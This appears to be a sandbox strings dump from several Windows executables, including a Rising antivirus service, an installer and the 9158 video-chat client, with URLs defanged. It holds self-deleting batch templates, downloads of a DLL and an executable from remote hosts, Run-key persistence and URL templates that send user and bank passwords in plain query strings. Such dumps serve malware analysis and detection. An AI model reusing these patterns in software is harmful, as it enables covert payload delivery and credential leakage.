CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
comx3.dll
KERNEL32.DLL
kernel32.dll
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
HTTP/1.0
Range: bytes=%d-
RstoreDll.dll
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s Path:%s
\RstoreDll.dll
02%d.d.d.d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::StartTask...success
CRsLoadCloud::InitData... CopyFile flag= %d.
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
CldRsd.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegSaveKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
CryptMsgClose
CertCloseStore
CertGetNameStringW
CertFindCertificateInStore
CRYPT32.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
WININET.dll
VERSION.dll
GetProcessHeap
GetCPInfo
zcÁ
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe
.Beijing Rising Information Technology Corporation Limited
1.0.0.50
RsMgrSvc.exe
20150423153938597

install1393485.exe_1148_rwx_10072000_00001000:

SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
ÞSKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
Label.dat
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d

popwndexe.exe_760:

.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>$>(>,>0>
5(565;5~7
mscoree.dll
KERNEL32.DLL
rsdk.dll
<plugin clsid='{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}' name='CLID_CRsPopWndUI' start='1'/>
<plugin clsid='{EBC23555-424F-45c3-BECE-206819CB276B}' name='ClSID_CTrayWnd' start='999' /> </plugins></process></rscom>
BUF:<?xml version='1.0' ?><rscom> <components> <component path='rsdk.dll'> <clsid progid='RscomEnv.1'>{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}</clsid> <clsid progid='ObjectLoader.1'>{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}</clsid> <clsid progid='Rot.1'>{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}</clsid> <clsid progid='MainRun.1'>{C8CA7580-8E65-49E6-A66A-B087C7EF523D}</clsid> <clsid progid='RsSrv.1'>{5D37C04C-8F58-4D47-94C8-B94153399473}</clsid> <clsid progid='Property.1'>{ED20E0E5-2357-4825-B3FA-198AEC674E81}</clsid> <clsid progid='PropertyThread.1'>{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}</clsid> <clsid progid='Property2.1'>{2100E98D-B13E-4306-8081-50F325B10586}</clsid> <clsid progid='Property2Thread.1'>{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}</clsid> <clsid>{E8D494C-D598-4E2F-B796-809E74315E76}</clsid> <clsid>{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}</clsid> <clsid progid='TrayWnd'>{EBC23555-424F-45C3-BECE-206819CB276B}</clsid> <clsid progid='TraySrv'>{4FCE6281-8849-4FC6-A764-95C793EB8A48}</clsid> <clsid progid='TrayMenuBase'>{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}</clsid> <clsid>{35FD921E-B758-46D8-B0AA-FCD033B0E66D}</clsid> <clsid progid='DfwWindow'>{201409F6-22F8-48D3-A69F-7935BDDE6BFA}</clsid> <clsid progid='DfwComponentMgr'>{787683B8-D58D-4072-BA04-46284CEA5AF8}</clsid> <clsid progid='DfwDrawIcon'>{224E5B34-E98F-4033-8B6F-46B758E7587E}</clsid> <clsid progid='DfwLocalExternal'>{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}</clsid> <clsid progid='SafeSecurity'>{B769D42A-2392-42B6-8C10-DB99AE23F75A}</clsid> </component> <component path = 'localopt.dll'> <clsid progid='localopt'>{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}</clsid> </component> <component path = 'rsmginfo.dll'> <clsid progid='rsmginfo'>{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}</clsid> </component> </components></rscom>
{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s
%Program Files%\Rising\RSD\popwndexe.exe
1.0.0.7
tray.exe
814210592210000

9158.exe_3012:

.text
`.rdata
@.data
.rsrc
SSh0'
@ SSh`
N SShy
j.hH8S
O SSh
W SSh
H SSh
@ SShU
SSSSSSSh
F SSh
<4,$?7/'
(3-!0,1'8"5.*2$
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
FSkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s
%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
%s?url=%s
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................%f*%d = %d
//player.ini
SkinRes\BroadCastBtn.bmp
SkinRes\Broadcastclose.bmp
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
car.xml
\allplat.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;
yqh:expression((this.offsetWidth > this.offsetHeight)?
(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):
(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
<div class="img50"><img src='%s' /></div></body>
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
HallClose.ini
broadHistory.txt
SOFTWARE\9158web\%s
skinres\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
<?xml version="1.0" encoding="GB2312"?>%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:{"uidx":%s,"uid":"%s","usex":%s,"viplevel":%d}^|$|^%s
6,%s,%s,0,0
6,%s,%s,%s,%s,%s,%s,%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
skinres\skin.ini
//HallClose.ini
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=1 scrollDelay=2 direction=left></MARQUEE></div></body></html>
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
SOFTWARE\9158web
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
idx=%s&u_name=%s&c_name=%s
tiaoshi: %s===>%s
hXXp://room.9158.com/apps/webloginapi.aspx
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LastLoginType
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SOFTWARE\9158web\
allplat.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content: 
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=2 scrollDelay=2 direction=left>
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
<br><br><div style='font-size:14px;padding:15px'>%s<a href='hXXp://v.9158.com' target='_blank'>
%H:%M:%S
%s\%s.log
hXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%s
hXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktv
hXXp://room.9158.com/ktv_new/free_mic.aspx?userid=
hXXp://room.9158.com/ktv_new/song_in.aspx?userid=
&r=%d
dance_room_new/click_save.aspx
hXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%s
hXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d
9158.com
tiao58.com
SOFTWARE\t58web
&userid=%s&intype=2&type=%s
&type=%s
<div align=center><img onclick="window.external.FreezeBank(11);" src='
//skinres//Moneyupfreeze.bmp'></div>
//skinres//MoneyRestPass.bmp'> 
<img onclick="window.external.FreezeBank(12);" src='
%d-%d-%d %d:%d
hXXp://roommanage.9158.com/active/roomsearch/iproom_new.aspx?pstr=%s&cstr=%s&r=%d
LoginCount
hXXp://room.9158.com/apps/Activity.ashx?act=8&lastime=%s
%s?user=%s&itype=%d
SkinRes\icon_rt.png
<img src="%s" style="float:right;"/>
</strong></p><p> %s</p>
</strong></p><p> %s<a onclick="window.external.GotoGetGift()"; style="float:right; cursor:hand;">
hXXp://cugame.9158.com/active/usersearch_k/message_head.aspx?useridx=%d&head=%s&mess=%s&roomid=%d
hXXp://cugame.9158.com/active/userinfor/head_info.aspx?useridx=%d&r=%d
(*.jpg)|*.jpg||
hXXp://roommanage.9158.com/active/song_tui/code_view.aspx
&jumpurl=
&logkey=
filter.zip
help.xml
serverlist.txt
;padding-left:13px;color:#0177b5;font-size:12px;text-decoration:none}.a2 { display:block;width:180px;height:48px;background:url('#path#\btn_vip1.bmp');background-repeat:no-repeat } .a2:hover { display:block;width:180px;height:48px;background:url('#path#\btn_vip2.bmp');background-repeat:no-repeat }.a3 { display:block;width:180px;height:48px;background:url('#path#\btn_crown1.bmp');background-repeat:no-repeat } .a3:hover { display:block;width:180px;height:48px;background:url('#path#\btn_crown2.bmp');background-repeat:no-repeat }</style><body onMouseOut="window.external.OnMouseHeadOut(1)" onMouseOver="window.external.OnMouseHeadIn(1)" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none;"></body>
<style>.myimg{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_vip1.bmp') left no-repeat;} a:hover img{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown2.bmp') left no-repeat;}</style><table background='#path#\vip.jpg' width=100% height=100% border='0' cellspacing='0' cellpadding='0'><tr><td height=300> </td></tr><tr><td height=20> <a href='hXXp://vip.9158.com/ ' target=_blank class=a1>
>></a></td></tr><tr><td height=40 align=center valign=top> <a href='javascript:window.external.MsgEnterRoom(100001)' class=a2></a></td></tr></body>
<style>.myimg{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown1.bmp') left no-repeat;} a:hover img{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown2.bmp') left no-repeat;}</style><table background='#path#\crown.jpg' width=100% height=100% border='0' cellspacing='0' cellpadding='0'><tr><td height=300> </td></tr><tr><td height=20> <a href='hXXp://vip.9158.com/ ' target=_blank class=a1>
>></a></td></tr><tr><td height=40 align=center valign=top> <a href='javascript:window.external.MsgEnterRoom(100001)' class=a3></a></td></tr></body>
<html xmlns='hXXp://VVV.w3.org/1999/xhtml'><style type='text/css'>.item { position:relative; float:left; height:167px; margin:10px 15px 25px 0px; width:160px; } .item .bottom_bg, .item .del, .item .del2, .item .hide, .item .hide2, .item .line { display:none; } .item .item_bg { background:#dfefff; border:1px solid #d0e8ff; height:165px; } .lock { position:absolute; left:10px; top:10px; } .item_sel .bottom_bg, .item_sel .del, .item_sel .del2, .item_sel .hide, .item_sel .hide2, .item_sel .line { display:block; } .item_sel .item_bg { height:165px; background:#d9ecff; border:1px solid #b4daff; } .bottom_bg { position:absolute; left:0px; top:165px; width:160px; height:27px; background:#b4daff; } .item .hide, .item .del { position:absolute; left:106px; top:172px; color:#27384e; font-size:14px; text-decoration:none; } .item .del { left:22px; } .item .del2 { position:absolute; left:25px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .item .hide2 { position:absolute; left:106px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .prev, .next { background:#E7F3FF; border:1px solid #AFD7FF; padding:5px 15px; *padding:5px 15px 4px 15px; color:#004FB6; font-size:14px; text-decoration:none; } .prev2, .next2 { border:1px solid #b7c6d5; color:#8a9fba; cursor:default; }</style><body style='background:#EBF4FF; color:#333; font-size:12px; font-family:arial;'><div style='margin:10px auto 10px; width:99%;'><div><div style='position:relative; z-index:1; background:url(#pic#title_bg.png) repeat-x #c2e0ff; border:1px solid #bee1ff; border-left-color:#b3d7fd; border-right-color:#b3d7fd; border-bottom:none; height:36px; line-height:35px; vertical-align:middle; overflow:hidden;'><div style='position:absolute; z-index:9; left:10px; top:0px; text-align:center; font-size:14px; color:#2D4389; text-decoration:none;'>#sel1#</div><a href="javascript:window.external.OnHistory_Showinfo(1,0)" style='position:absolute; right:10px; padding-left:17px; color:#2D4389; text-decoration:none; background:url(#pic#f5.png) no-repeat 0px 10px;'>
#p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'"><div class='item_bg' onclick='window.external.OnHistory_Showinfo(2,#pa#)'><div class='img' style='position:absolute; left:0px; top:0px;'><img onerror="this.src='#purl#'" src='#p5#' style='border:none;width:160px;height:120px' /></div><div class='lock' style='display:#p4#'><img src='#pic#lock.png' /></div><div class='text' style='position:absolute; left:10px; top:124px;'><p class='name' style='color:#004fb6; padding:2px 0px; margin:0;'>#p2#</p><p style='color:#475465; padding:0; margin:0;'>#p1#</p></div></div><div class='bottom_bg'></div><span class='line' style='position:absolute; left:80px; top:165px; width:1px; height:27px; boder-left:1px solid #a9ccee; background:#a9ccee;'></span><a #p8#>
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s
%s-%s|
HistoryRoom.xml
hXXp://room.9158.com/ktv_new/lately_room.aspx?r=
hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=
href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next '
href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '
')){window.external.OnHistory_Showinfo(4,#pa#);}"
\skinres\fav\sel1.gif' style='border:none;'>
hXXp://room.9158.com/images/newten/go-home.gif
#purl#
hXXp://room.9158.com/ktv_new/head1.jpg
class='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"
\skinres\fav\sel2.gif' style='border:none;'>
iexplore.exe
hXXp://cugame.9158.com/active/app/load.htm
login=
hXXp://VVV.9158.com/client/login/loginback.aspx?
skinres\RankRate.bmp
skinres\Hall\SearchRoomTopRight.bmp
skinres\Hall\SearchRoomTopLeft.bmp
<img width="227" height="67" src="%s">
skinres\Unknown.jpg
skinres\scroll.bmp
\Game\ddvGame.ini
SkinRes//none.bmp
SkinRes\TreeStatus.bmp
SkinRes\Hall\searchRoombtn.bmp
SkinRes\Hall\headbutton.bmp
SkinRes\Hall\MiniInfor.bmp
SkinRes\Hall\bag.bmp
SkinRes\systemCenter.bmp
SkinRes\set.bmp
SkinRes\mybank.bmp
SkinRes\vip.bmp
SkinRes\systemSet.bmp
SkinRes\systemReg.bmp
\SkinRes\IMToolBar.bmp
Head\era.bmp
Head\crown.bmp
Head\topestpurple2.bmp
Head\topestpurple.bmp
Head\DiamondPurple2.bmp
Head\DiamondPurple.bmp
Head\queenPurple2.bmp
Head\queenPurple.bmp
Head\Purple2.bmp
Head\Purple.bmp
Head\purplevip2.bmp
Head\purplevip.bmp
Head\level15.bmp
Head\redvip.bmp
Head\0_bluevip.bmp
Head\paliesman.bmp
onclick="window.external.OnclickHead('1')">
<img onMouseOut="window.external.OnMouseHeadOut(0)" onMouseOver="window.external.OnMouseHeadIn(0)" width="60" height="45" src="%s" style=cursor:hand>
hXXp://
Head\user_photo.bmp
hXXp://vip.9158.com/
Head\H5_2.bmp
Head\H5_1.bmp
Head\H4_2.bmp
Head\H4_1.bmp
Head\H3_2.bmp
Head\H3_1.bmp
Head\H2_2.bmp
Head\H2_1.bmp
Head\H1_2.bmp
Head\H1_1.bmp
Head\H0_2.bmp
Head\H0_1.bmp
-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"
%Y%m%d
%s\%d\%s
SkinRes\BtnMinInfor.bmp
SkinRes\BtnCloseInfor.bmp
%s&uidx=%s
SkinRes\brInfor.bmp
SkinRes\blInfor.bmp
SkinRes\trInfor.bmp
SkinRes\tlInfor.bmp
%s %s
%d||%d||%d||%s
.img50 { width:50px; height:50px; text-align:center; }
div.img50 img { max-width:50px; max-height:50px;
yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
<body scroll="no" bgcolor=#FEFECC><div class="img50"><img src='%s' /></div></body></html>
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
LoginDlg2
//banner//logbg.bmp
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="window.event.returnValue=false;" style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none">
' target='_blank' onFocus='this.blur()'>
\guestlogin.ini
SkinRes\TG\mins1.bmp
//banner//log_min.bmp
SkinRes\TG\closes1.bmp
//banner//log_close.bmp
Hall_LoginMenu
Login_Guest
Hall_LoginCancel
Hall_LoginOK
HallLoginReg
Login_Weibo
Login_Alipay
Login_QR
Login_QQ
Login_idx
Login_User
GuestLogin_Tui
GetLoginNodeData.aspx
dl.week8.net
platname=%s&userid=%s&loginip=%s&loginport=%d
/Error.txt
CLoginDlg m_nLoginType!=nType
hXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspx
SysMsgCloseBtn
skinres\login.gif
hXXp://VVV.9158.com/?code=
SkinRes/IeClose.png
%H : %M      %Y/%m/%d
nIDKey
MsgCloseBtn
SockClient.dll
Multi*.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
%sBugReport.exe ,%s
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address1: X X:X %s
Exception code1: X %s
//build4.5%d-%d-%d %d:%d:%d***************************************************
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmi.bmp
SkinRes\roomclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&userid=%s
%s&r=%d
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
//91KboxVCamSetup.exe
//9158VCamSetup.exe
//91KboxVCamSetup.exe
91KboxVCamSetup.exe
//9158VCamSetup.exe
9158VCamSetup.exe
C:\2.txt
%s//in_userchange.aspx?%s
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://cugame.9158.com/active/roomapply/apply.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
<head><style type='text/css'>.photo img { border:none; }
.photo { position:relative; width:540px; height:650px; margin:0px auto; }
.photo .img, .photo .prev, .photo .next, .photo .down, .photo .share_t,
.photo .share_qzone, .photo .share_weibo { position:absolute; z-index:1; }
